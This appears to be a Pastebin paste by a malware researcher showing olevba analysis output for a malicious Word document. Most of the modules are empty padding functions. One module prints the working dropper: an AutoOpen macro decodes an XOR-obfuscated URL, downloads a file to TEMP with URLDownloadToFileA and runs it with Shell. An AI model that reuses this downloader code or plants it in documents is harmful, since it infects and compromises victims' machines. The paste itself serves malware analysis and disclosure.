Advertisement
dynamoo

Malicious Word macro

Feb 24th, 2015
675
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Flags       Filename                                                        
  2. ----------- -----------------------------------------------------------------
  3. OLE:MAS---- irn001~1.doc
  4.  
  5. (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  6.  
  7. ===============================================================================
  8. FILE: irn001~1.doc
  9. Type: OLE
  10. -------------------------------------------------------------------------------
  11. VBA MACRO ThisDocument.cls
  12. in file: irn001~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  13. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  14. Sub autoopen()
  15. N1
  16. End Sub
  17. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  18. ANALYSIS:
  19. +----------+----------+---------------------------------------+
  20. | Type     | Keyword  | Description                           |
  21. +----------+----------+---------------------------------------+
  22. | AutoExec | AutoOpen | Runs when the Word document is opened |
  23. +----------+----------+---------------------------------------+
  24. -------------------------------------------------------------------------------
  25. VBA MACRO Class1.cls
  26. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class1'
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  28.  
  29. Private Function UmYcCcn()
  30.  
  31. End Function
  32. Private Sub TpNGCNftO()
  33.  
  34. End Sub
  35. Public Sub fHJqKPY()
  36.  
  37. End Sub
  38. Public Sub CBGdkrVjiyB()
  39.  
  40. End Sub
  41. Public Sub kdMvxRuzMJsFffG()
  42.  
  43. End Sub
  44. Public Function QCbsSsDxPzV()
  45.  
  46. End Function
  47. Public Sub SevJRSdAvZaGNgo()
  48.  
  49. End Sub
  50. Public Function FDIuAHZzyOE()
  51.  
  52. End Function
  53. Private Function EjhOD()
  54.  
  55. End Function
  56. Public Sub SdLLyyajvQr()
  57.  
  58. End Sub
  59. Private Function YMJDVSqakqmyO()
  60.  
  61. End Function
  62. Private Function wTBeubh()
  63.  
  64. End Function
  65. Private Function dZZYdNGNsS()
  66.  
  67. End Function
  68. Public Function bSrUzjfTofUjtcc()
  69.  
  70. End Function
  71. Private Function zLaHZ()
  72.  
  73. End Function
  74. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  75. ANALYSIS:
  76. No suspicious keyword or IOC found.
  77. -------------------------------------------------------------------------------
  78. VBA MACRO Class2.cls
  79. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class2'
  80. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  81.  
  82. Private Sub DMQRvKdxQKA()
  83.  
  84. End Sub
  85. Public Sub oteQeIVU()
  86.  
  87. End Sub
  88. Private Sub jHQPzikE()
  89.  
  90. End Sub
  91. Private Function JfsgRtPOqY()
  92.  
  93. End Function
  94. Private Sub FfrlDA()
  95.  
  96. End Sub
  97. Public Function JFQixSFPniLNtN()
  98.  
  99. End Function
  100. Private Sub wFGEJhnuZmlBEH()
  101.  
  102. End Sub
  103. Public Sub gQyAUxCP()
  104.  
  105. End Sub
  106. Private Sub iiJRfGbFevVw()
  107.  
  108. End Sub
  109. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  110. ANALYSIS:
  111. No suspicious keyword or IOC found.
  112. -------------------------------------------------------------------------------
  113. VBA MACRO Class3.cls
  114. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class3'
  115. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  116.  
  117. Public Function lLQQjgCYxplw()
  118.  
  119. End Function
  120. Public Sub mvSNrtatzH()
  121.  
  122. End Sub
  123. Private Function mkpMSaE()
  124.  
  125. End Function
  126. Private Sub lnfETL()
  127.  
  128. End Sub
  129. Private Function Adivsb()
  130.  
  131. End Function
  132. Public Function pyKmGlJcBcnhz()
  133.  
  134. End Function
  135. Public Sub zFBNetAC()
  136.  
  137. End Sub
  138. Public Sub HJqwP()
  139.  
  140. End Sub
  141. Public Function oonsdjrHi()
  142.  
  143. End Function
  144. Private Sub qiGkOMu()
  145.  
  146. End Sub
  147. Private Function kyIrrefFO()
  148.  
  149. End Function
  150. Public Function BasEspjByVFPVRe()
  151.  
  152. End Function
  153. Public Function SczhKaGMgodJEE()
  154.  
  155. End Function
  156. Public Sub mtYykADGy()
  157.  
  158. End Sub
  159. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  160. ANALYSIS:
  161. No suspicious keyword or IOC found.
  162. -------------------------------------------------------------------------------
  163. VBA MACRO Class4.cls
  164. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class4'
  165. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  166.  
  167. Private Sub eJEFDIuAZzyOEHyYAgeL()
  168.  
  169. End Sub
  170. Private Sub BPaIIvvQfsTorIUJGASPmVhnju()
  171.  
  172. End Sub
  173. Private Function ktQxbrexFuaVVTZKDKpPB()
  174.  
  175. End Function
  176. Private Sub PoRwgcQlbRgqZZL()
  177.  
  178. End Sub
  179. Private Function IQEVHLlaQ()
  180.  
  181. End Function
  182. Private Sub DZxDzL()
  183.  
  184. End Sub
  185. Private Sub AJTNrHauNH()
  186.  
  187. End Sub
  188. Private Function mlqbTbF()
  189.  
  190. End Function
  191. Public Function logETM()
  192.  
  193. End Function
  194. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  195. ANALYSIS:
  196. No suspicious keyword or IOC found.
  197. -------------------------------------------------------------------------------
  198. VBA MACRO Class5.cls
  199. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class5'
  200. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  201.  
  202. Private Function cBcnhziFpzFB()
  203.  
  204. End Function
  205. Public Function ACLjeHJqw()
  206.  
  207. End Function
  208. Public Function soonsdjrHihxn()
  209.  
  210. End Function
  211. Private Sub kOMujDtkyIrr()
  212.  
  213. End Sub
  214. Public Function ObDQBasEspj()
  215.  
  216. End Function
  217. Public Sub FPVReuvQSczhKaG()
  218.  
  219. End Sub
  220. Private Sub dJEEDItm()
  221.  
  222. End Sub
  223. Public Sub kADGyQAfOK()
  224.  
  225. End Sub
  226. Public Function BOZHHvhIfrFn()
  227.  
  228. End Function
  229. Public Sub UIFzRPmHg()
  230.  
  231. End Sub
  232. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  233. ANALYSIS:
  234. No suspicious keyword or IOC found.
  235. -------------------------------------------------------------------------------
  236. VBA MACRO Class6.cls
  237. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Class6'
  238. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  239.  
  240. Private Sub QQjgD()
  241.  
  242. End Sub
  243. Public Function zLOdyAJTNrH()
  244.  
  245. End Function
  246. Public Function HxdmmlqbTbFSR()
  247.  
  248. End Function
  249. Public Sub gETMwehB()
  250.  
  251. End Sub
  252. Public Function GcpcOqMKn()
  253.  
  254. End Function
  255. Public Sub cCcnhzwTpNGCNft()
  256.  
  257. End Sub
  258. Public Sub kfHJqKPYNtCCB()
  259.  
  260. End Sub
  261. Public Function rVjiyBEUkdMvxRuz()
  262.  
  263. End Function
  264. Private Function FffGOcDQ()
  265.  
  266. End Function
  267. Private Sub SsDxPzVFQ()
  268.  
  269. End Sub
  270. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  271. ANALYSIS:
  272. No suspicious keyword or IOC found.
  273. -------------------------------------------------------------------------------
  274. VBA MACRO Module1.bas
  275. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module1'
  276. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  277. Public Function rUkQQqyoTOPN()
  278.  
  279. End Function
  280. Public Sub EiJuKOQIi()
  281.  
  282. End Sub
  283. Public Sub VJeUL()
  284.  
  285. End Sub
  286. Public Sub RFsSpBQxOBFfSQ()
  287.  
  288. End Sub
  289. Private Function wSrxt()
  290.  
  291. End Function
  292. Private Function stDMHlAToGBqQfg()
  293.  
  294. End Function
  295. Private Function NUyLKbfiZyNFqY()
  296.  
  297. End Function
  298. Private Sub cqAUjVIjFEhNgRV()
  299.  
  300. End Sub
  301. Private Sub btqMjH()
  302.  
  303. End Sub
  304. Private Sub YnIwFdYBDkEJ()
  305.  
  306. End Sub
  307. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  308. ANALYSIS:
  309. No suspicious keyword or IOC found.
  310. -------------------------------------------------------------------------------
  311. VBA MACRO Module2.bas
  312. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module2'
  313. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  314. Private Function BQxOBFfS()
  315.  
  316. End Function
  317. Private Function awSrx()
  318.  
  319. End Function
  320. Public Function QstDMHlAToGB()
  321.  
  322. End Function
  323. Public Sub gejTNU()
  324.  
  325. End Sub
  326. Public Function bfiZyNFqYavYqAUjV()
  327.  
  328. End Function
  329. Private Function EhNgRVvVhbt()
  330.  
  331. End Function
  332. Public Function HzvHYnI()
  333.  
  334. End Function
  335. Public Function YBDkE()
  336.  
  337. End Function
  338. Public Function nvwuzQelPccr()
  339.  
  340. End Function
  341. Public Function OeQGorLo()
  342.  
  343. End Function
  344. Private Function mzZZAIUxQwT()
  345.  
  346. End Function
  347. Public Function xrJtPzK()
  348.  
  349. End Function
  350. Public Sub pDLMVuoRTAGaiYD()
  351.  
  352. End Sub
  353. Private Sub CnuBRssHyA()
  354.  
  355. End Sub
  356. Private Function ZQEtNEvIT()
  357.  
  358. End Function
  359. Private Function pQZlNhMk()
  360.  
  361. End Function
  362. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  363. ANALYSIS:
  364. No suspicious keyword or IOC found.
  365. -------------------------------------------------------------------------------
  366. VBA MACRO Module3.bas
  367. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module3'
  368. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  369. Private Sub OcDQCbsSsDx()
  370.  
  371. End Sub
  372. Private Sub FQQSevJRSdAvZaG()
  373.  
  374. End Sub
  375. Private Function eJEFDIuA()
  376.  
  377. End Function
  378. Private Sub yOEHyYAgeL()
  379.  
  380. End Sub
  381. Private Function BPaIIvvQfsTo()
  382.  
  383. End Function
  384. Private Sub UJGASPmVhnju()
  385.  
  386. End Sub
  387. Public Function ktQxbr()
  388.  
  389. End Function
  390. Private Sub FuaVVTZKD()
  391.  
  392. End Sub
  393. Public Sub BQUYPoRwgcQlb()
  394.  
  395. End Sub
  396. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  397. ANALYSIS:
  398. No suspicious keyword or IOC found.
  399. -------------------------------------------------------------------------------
  400. VBA MACRO Module4.bas
  401. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module4'
  402. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  403. Private Function frFnEquUIFzR()
  404.  
  405. End Function
  406. Public Function gmiuxLijsCxb()
  407.  
  408. End Function
  409. Public Function wqgLU()
  410.  
  411. End Function
  412. Public Function JCJoBAQTQOoCvgN()
  413.  
  414. End Function
  415. Private Sub RfpKYLxZvuVDU()
  416.  
  417. End Sub
  418. Public Sub LQQjgCY()
  419.  
  420. End Sub
  421. Private Function wNdymvS()
  422.  
  423. End Function
  424. Public Sub atzHwclmk()
  425.  
  426. End Sub
  427. Private Sub aERQhlnfETLweg()
  428.  
  429. End Sub
  430. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  431. ANALYSIS:
  432. No suspicious keyword or IOC found.
  433. -------------------------------------------------------------------------------
  434. VBA MACRO Module5.bas
  435. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module5'
  436. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  437. (empty macro)
  438. -------------------------------------------------------------------------------
  439. VBA MACRO Module6.bas
  440. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module6'
  441. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  442. Public Function bfiZyNFqYavY()
  443.  
  444. End Function
  445. Public Function UjVIjFEhNg()
  446.  
  447. End Function
  448. Public Sub VhbtqMjHz()
  449.  
  450. End Sub
  451. Public Function nIwFdYBDkEJRHnv()
  452.  
  453. End Function
  454. Public Sub QelPccrvyp()
  455.  
  456. End Sub
  457. Public Sub GorLosGCmzZZAIU()
  458.  
  459. End Sub
  460. Private Function TmLmxrJtP()
  461.  
  462. End Function
  463. Private Sub LYpDLMVuoRTAGa()
  464.  
  465. End Sub
  466. Private Sub yzxCnuBRssH()
  467.  
  468. End Sub
  469. Public Sub RuZQEtNEv()
  470.  
  471. End Sub
  472. Public Sub BppQZlNhMkC()
  473.  
  474. End Sub
  475. Private Function uMJgPbgdoF()
  476.  
  477. End Function
  478. Private Function mKrUk()
  479.  
  480. End Function
  481. Private Sub yoTOPNSD()
  482.  
  483. End Sub
  484. Private Sub JuKOQI()
  485.  
  486. End Sub
  487. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  488. ANALYSIS:
  489. No suspicious keyword or IOC found.
  490. -------------------------------------------------------------------------------
  491. VBA MACRO Module7.bas
  492. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module7'
  493. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  494. Public Sub OeQGorLoGCmzZZAIU()
  495.  
  496. End Sub
  497. Public Sub TmLmxrJtPKPLYpDLMVu()
  498.  
  499. End Sub
  500. Private Sub AGaiYDyzxCnuBR()
  501.  
  502. End Sub
  503. Public Sub yAsRuZQEtNEv()
  504.  
  505. End Sub
  506. Public Function BppQZlNhMkCCAuMJgPbgdoFG()
  507.  
  508. End Function
  509. Private Sub KrUkQQq()
  510.  
  511. End Sub
  512. Private Sub OPNSDwEiJuKOQI()
  513.  
  514. End Sub
  515. Public Function aVJeULak()
  516.  
  517. End Function
  518. Private Function sSpBQxOBFfS()
  519.  
  520. End Function
  521. Private Function awSrxEHQstDMHl()
  522.  
  523. End Function
  524. Public Function GBqQfgej()
  525.  
  526. End Function
  527. Private Sub yLKbfiZyNFqYav()
  528.  
  529. End Sub
  530. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  531. ANALYSIS:
  532. No suspicious keyword or IOC found.
  533. -------------------------------------------------------------------------------
  534. VBA MACRO Module8.bas
  535. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module8'
  536. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  537. Public Sub hxnqiG()
  538.  
  539. End Sub
  540. Private Function ujDtkyIrrefFO()
  541.  
  542. End Function
  543. Public Sub BasEspjByVFPVRevQSczhKaG()
  544.  
  545. End Sub
  546. Private Function dJEEDItmYykADGyQA()
  547.  
  548. End Function
  549. Private Function zTKBOZHHvhIf()
  550.  
  551. End Function
  552. Public Function EquUIFz()
  553.  
  554. End Function
  555. Private Sub HgmiuxL()
  556.  
  557. End Sub
  558. Private Function CxbqIdwqg()
  559.  
  560. End Function
  561. Public Function TZJCJoBAQTQOoCv()
  562.  
  563. End Function
  564. Public Function kMRfpKYLxZvuV()
  565.  
  566. End Function
  567. Public Sub KlLQQjgCYxpl()
  568.  
  569. End Sub
  570. Private Function ymvSN()
  571.  
  572. End Function
  573. Public Sub KPYNtCCB()
  574.  
  575. End Sub
  576. Private Function rVjiyBE()
  577.  
  578. End Function
  579. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  580. ANALYSIS:
  581. No suspicious keyword or IOC found.
  582. -------------------------------------------------------------------------------
  583. VBA MACRO Module9.bas
  584. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module9'
  585. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  586. Public Sub UVTZJCJoBAQTQ()
  587.  
  588. End Sub
  589. Private Sub vgNPkMRfpKY()
  590.  
  591. End Sub
  592. Public Sub vuVDUGKlLQQjgCY()
  593.  
  594. End Sub
  595. Private Sub wNdymvSrtatzHwclmkpM()
  596.  
  597. End Sub
  598. Private Sub RQhlnfETLwe()
  599.  
  600. End Sub
  601. Public Sub ivsbo()
  602.  
  603. End Sub
  604. Public Sub yKmGlJcB()
  605.  
  606. End Sub
  607. Private Function ziFpzF()
  608.  
  609. End Function
  610. Private Function tACLje()
  611.  
  612. End Function
  613. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  614. ANALYSIS:
  615. No suspicious keyword or IOC found.
  616. -------------------------------------------------------------------------------
  617. VBA MACRO Module10.bas
  618. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module10'
  619. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  620. (empty macro)
  621. -------------------------------------------------------------------------------
  622. VBA MACRO Module11.bas
  623. in file: irn001~1.doc - OLE stream: u'Macros/VBA/Module11'
  624. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  625. #If VBA7 Then
  626.     Private Declare PtrSafe Function GHGijkHKJG Lib "urlmon" Alias _
  627.     "URLDownloadToFileA" (ByVal pCaller As LongPtr, _
  628.     ByVal sdfsdf As String, _
  629.     ByVal jdfgdfg As String, _
  630.     ByVal tjrtgefsdf As Long, _
  631.     ByVal khlkdfsef As LongPtr) As LongPtr
  632. #Else
  633.     Private Declare Function GHGijkHKJG Lib "urlmon" Alias _
  634.     "URLDownloadToFileA" (ByVal pCaller As Long, _
  635.     ByVal sdfsdf As String, _
  636.     ByVal jdfgdfg As String, _
  637.     ByVal tjrtgefsdf As Long, _
  638.     ByVal khlkdfsef As Long) As Long
  639. #End If
  640.  
  641.  
  642. Sub N1()
  643. tiO XorByDataLen("—‹‹ÅÐЗš–”š—ž““Ñ›šÐ•ŒÐ–‘Ñš‡š"), Environ(XorByDataLen("«²¯")) & XorByDataLen("£¸·•”›™˜Ñš‡š")
  644. Dim ZjplxNd As Integer
  645. For ZjplxNd = 0 To 0
  646. If ZjplxNd = 5 Then End
  647. Next ZjplxNd
  648. Dim bpQoaeEsqkC As Integer
  649. For bpQoaeEsqkC = 0 To 0
  650. If bpQoaeEsqkC = 5 Then End
  651. Next bpQoaeEsqkC
  652. End Sub
  653. Function tiO(f243r14Z As String, x9 As String) As Boolean
  654. vJHKBJdfkgfg = GHGijkHKJG(0&, f243r14Z, x9, 0&, 0&)
  655. Dim erSnRqHiITNg As Integer
  656. For erSnRqHiITNg = 0 To 0
  657. If erSnRqHiITNg = 5 Then End
  658. Next erSnRqHiITNg
  659. Dim oocNpLYmT As Integer
  660. For oocNpLYmT = 0 To 0
  661. If oocNpLYmT = 5 Then End
  662. Next oocNpLYmT
  663. Dim OwZLs2
  664. Dim KMhJO As Integer
  665. For KMhJO = 0 To 0
  666. If KMhJO = 5 Then End
  667. Next KMhJO
  668. Dim LYmTlQb As Integer
  669. For LYmTlQb = 0 To 0
  670. If LYmTlQb = 5 Then End
  671. Next LYmTlQb
  672. OwZLs2 = Shell(x9, 1)
  673. Dim OcZHUuuVer As Integer
  674. For OcZHUuuVer = 0 To 0
  675. If OcZHUuuVer = 5 Then End
  676. Next OcZHUuuVer
  677. Dim ocNpLYm As Integer
  678. For ocNpLYm = 0 To 0
  679. If ocNpLYm = 5 Then End
  680. Next ocNpLYm
  681. End Function
  682.  
  683. Public Function XorByDataLen(sData As String) As String
  684. Dim bData() As Byte
  685. Dim ZvfqvsD As Integer
  686. For ZvfqvsD = 0 To 0
  687. If ZvfqvsD = 5 Then End
  688. Next ZvfqvsD
  689. Dim pKArFPyyl As Integer
  690. For pKArFPyyl = 0 To 0
  691. If pKArFPyyl = 5 Then End
  692. Next pKArFPyyl
  693. Dim i As Integer
  694. Dim QvHHQbeVuJ As Integer
  695. For QvHHQbeVuJ = 0 To 0
  696. If QvHHQbeVuJ = 5 Then End
  697. Next QvHHQbeVuJ
  698. Dim Npaquw As Integer
  699. For Npaquw = 0 To 0
  700. If Npaquw = 5 Then End
  701. Next Npaquw
  702. If Len(sData) <> 0 Then
  703. Dim xnSccaf As Integer
  704. For xnSccaf = 0 To 0
  705. If xnSccaf = 5 Then End
  706. Next xnSccaf
  707. Dim RCxmGxo As Integer
  708. For RCxmGxo = 0 To 0
  709. If RCxmGxo = 5 Then End
  710. Next RCxmGxo
  711. ReDim bData(Len(sData))
  712. Dim NrEDTYbRrG As Integer
  713. For NrEDTYbRrG = 0 To 0
  714. If NrEDTYbRrG = 5 Then End
  715. Next NrEDTYbRrG
  716. Dim bQwrsqvgZgKl As Integer
  717. For bQwrsqvgZgKl = 0 To 0
  718. If bQwrsqvgZgKl = 5 Then End
  719. Next bQwrsqvgZgKl
  720. bData = StrConv(sData, vbFromUnicode)
  721. Dim yYyJDVSp As Integer
  722. For yYyJDVSp = 0 To 0
  723. If yYyJDVSp = 5 Then End
  724. Next yYyJDVSp
  725. Dim dUuQB As Integer
  726. For dUuQB = 0 To 0
  727. If dUuQB = 5 Then End
  728. Next dUuQB
  729. For i = 0 To Len(sData) - 1
  730. Dim NdwPje As Integer
  731. For NdwPje = 0 To 0
  732. If NdwPje = 5 Then End
  733. Next NdwPje
  734. Dim qyzJh As Integer
  735. For qyzJh = 0 To 0
  736. If qyzJh = 5 Then End
  737. Next qyzJh
  738. bData(i) = bData(i) Xor 255
  739. Dim xPMkFekgs As Integer
  740. For xPMkFekgs = 0 To 0
  741. If xPMkFekgs = 5 Then End
  742. Next xPMkFekgs
  743. Dim CmxDzK As Integer
  744. For CmxDzK = 0 To 0
  745. If CmxDzK = 5 Then End
  746. Next CmxDzK
  747. Next i
  748. Dim sfGcpDlCo As Integer
  749. For sfGcpDlCo = 0 To 0
  750. If sfGcpDlCo = 5 Then End
  751. Next sfGcpDlCo
  752. Dim dzjuzwHZ As Integer
  753. For dzjuzwHZ = 0 To 0
  754. If dzjuzwHZ = 5 Then End
  755. Next dzjuzwHZ
  756. XorByDataLen = StrConv(bData, vbUnicode)
  757. Dim pcCZmAhzl As Integer
  758. For pcCZmAhzl = 0 To 0
  759. If pcCZmAhzl = 5 Then End
  760. Next pcCZmAhzl
  761. Dim yNGqY As Integer
  762. For yNGqY = 0 To 0
  763. If yNGqY = 5 Then End
  764. Next yNGqY
  765. End If
  766. Dim TCCpcCZmAh As Integer
  767. For TCCpcCZmAh = 0 To 0
  768. If TCCpcCZmAh = 5 Then End
  769. Next TCCpcCZmAh
  770. Dim vYcqn As Integer
  771. For vYcqn = 0 To 0
  772. If vYcqn = 5 Then End
  773. Next vYcqn
  774. End Function
  775.  
  776.  
  777. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  778. ANALYSIS:
  779. +------------+--------------------+-----------------------------------------+
  780. | Type       | Keyword            | Description                             |
  781. +------------+--------------------+-----------------------------------------+
  782. | Suspicious | Lib                | May run code from a DLL                 |
  783. | Suspicious | Shell              | May run an executable file or a system  |
  784. |            |                    | command                                 |
  785. | Suspicious | Environ            | May read system environment variables   |
  786. | Suspicious | Xor                | May attempt to obfuscate specific       |
  787. |            |                    | strings                                 |
  788. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  789. +------------+--------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement